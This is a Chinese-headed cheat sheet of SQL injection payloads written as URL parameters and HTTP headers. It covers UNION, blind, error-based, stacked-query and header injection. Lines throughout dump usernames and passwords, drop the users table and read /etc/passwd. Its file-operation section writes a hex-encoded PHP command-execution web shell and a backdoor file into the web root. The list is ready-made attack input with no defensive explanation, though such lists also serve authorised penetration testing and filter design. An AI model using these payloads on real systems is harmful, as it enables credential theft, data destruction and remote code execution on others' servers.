# 常见SQL注入测试URL
'
"
 AND 1=1
 AND 1=2
 OR 1=1
 OR 1=2
 SLEEP(5)
 WAITFOR DELAY '0:0:5'
 ' OR '1'='1
 1/**/AND/**/1=1
 " OR "1"="1
 ' AND 1=CONVERT(int,(SELECT table_name FROM information_schema.tables))
 1 UNION SELECT 1,2,3-- 
?id=1'
?id=1"
?id=1 AND 1=1
?id=1 AND 1=2
?id=1 OR 1=1
?id=1 OR 1=2
?id=1 SLEEP(5)
?id=1 WAITFOR DELAY '0:0:5'
?id=1;SELECT * FROM users
?id=1 UNION SELECT 1,2,3
?id=1/**/AND/**/1=1
?id=1' OR '1'='1
?id=1" OR "1"="1
?id=1' AND 1=CONVERT(int,(SELECT table_name FROM information_schema.tables))
?id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))a)
?id=1 AND EXTRACTVALUE(1,CONCAT(0x5c,(SELECT table_name FROM information_schema.tables)))
?id=1' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT table_name FROM information_schema.tables),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND '1'='1
?id=1' OR '1'='1  
?user=admin'--  
?param=1 UNION SELECT 1,2,3--  
?search=' AND 1=CONVERT(int, (SELECT CURRENT_USER))--  
?id=1; DROP TABLE users--  
?input=1' AND (SELECT * FROM (SELECT(SLEEP(5)))a)--  
?key=1' AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(version(),0x3a,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--  
?data=1' INTO OUTFILE '/var/www/backdoor.php'--  
?query=admin'/*!50000OR*/1=1--  
?filter=1' AND SUBSTRING((SELECT password FROM users LIMIT 1),1,1)='a'--  
# 基础注入
?id=1'
?id=1"
?id=1 AND 1=1
?id=1 AND 1=2
?id=1 OR 1=1--
?id=1' OR '1'='1
?id=1" OR "1"="1
?user=admin'--
?user=admin'/*
?pass=123' OR 'a'='a

# 联合查询注入
?id=1 UNION SELECT 1,2,3--
?id=1 UNION SELECT null,version(),database()--
?id=-1 UNION SELECT 1,table_name,3 FROM information_schema.tables--
?id=1 UNION SELECT 1,column_name,3 FROM information_schema.columns WHERE table_name='users'--
?id=1 UNION SELECT 1,username,password FROM users--

# 布尔盲注
?id=1 AND SUBSTRING(database(),1,1)='a'
?id=1 AND (SELECT COUNT(*) FROM users)>10
?id=1 AND EXISTS(SELECT * FROM users WHERE username LIKE 'admin%')
?id=1 AND ASCII(SUBSTRING((SELECT password FROM users LIMIT 1),1,1))>50

# 时间盲注
?id=1 AND IF(1=1,SLEEP(5),0)
?id=1' AND (SELECT * FROM (SELECT(SLEEP(5)))a)--
?id=1 AND (SELECT COUNT(*) FROM information_schema.tables)>10 AND SLEEP(5)
?id=1 AND BENCHMARK(10000000,MD5('test'))

# 报错注入
?id=1 AND GTID_SUBSET(CONCAT(0x7e,(SELECT GROUP_CONCAT(table_name) FROM information_schema.tables),0x7e),1)
?id=1 AND EXP(~(SELECT * FROM (SELECT CURRENT_USER())a))
?id=1 AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT @@version),0x7e))
?id=1' AND UPDATEXML(1,CONCAT(0x7e,(SELECT password FROM users LIMIT 1),0x7e),1)--

# 堆叠查询
?id=1'; DROP TABLE users--
?id=1'; CREATE TABLE test(cmd text)--
?id=1'; INSERT INTO test(cmd) VALUES('whoami')--
?id=1'; COPY test FROM '/etc/passwd'--

# HTTP头注入
User-Agent: ' OR 1=1--
X-Forwarded-For: 1' AND (SELECT 1 FROM users WHERE username='admin')=1--
Cookie: sessionid=1' UNION SELECT 1,2,3--
Referer: http://evil.com' AND (SELECT LOAD_FILE('/etc/passwd')) IS NOT NULL--

# 文件操作
?id=1' INTO OUTFILE '/var/www/shell.php' LINES TERMINATED BY 0x3C3F7068702073797374656D28245F4745545B2763275D293B203F3E--
?id=1' INTO DUMPFILE '/usr/lib/php5/soap.php'
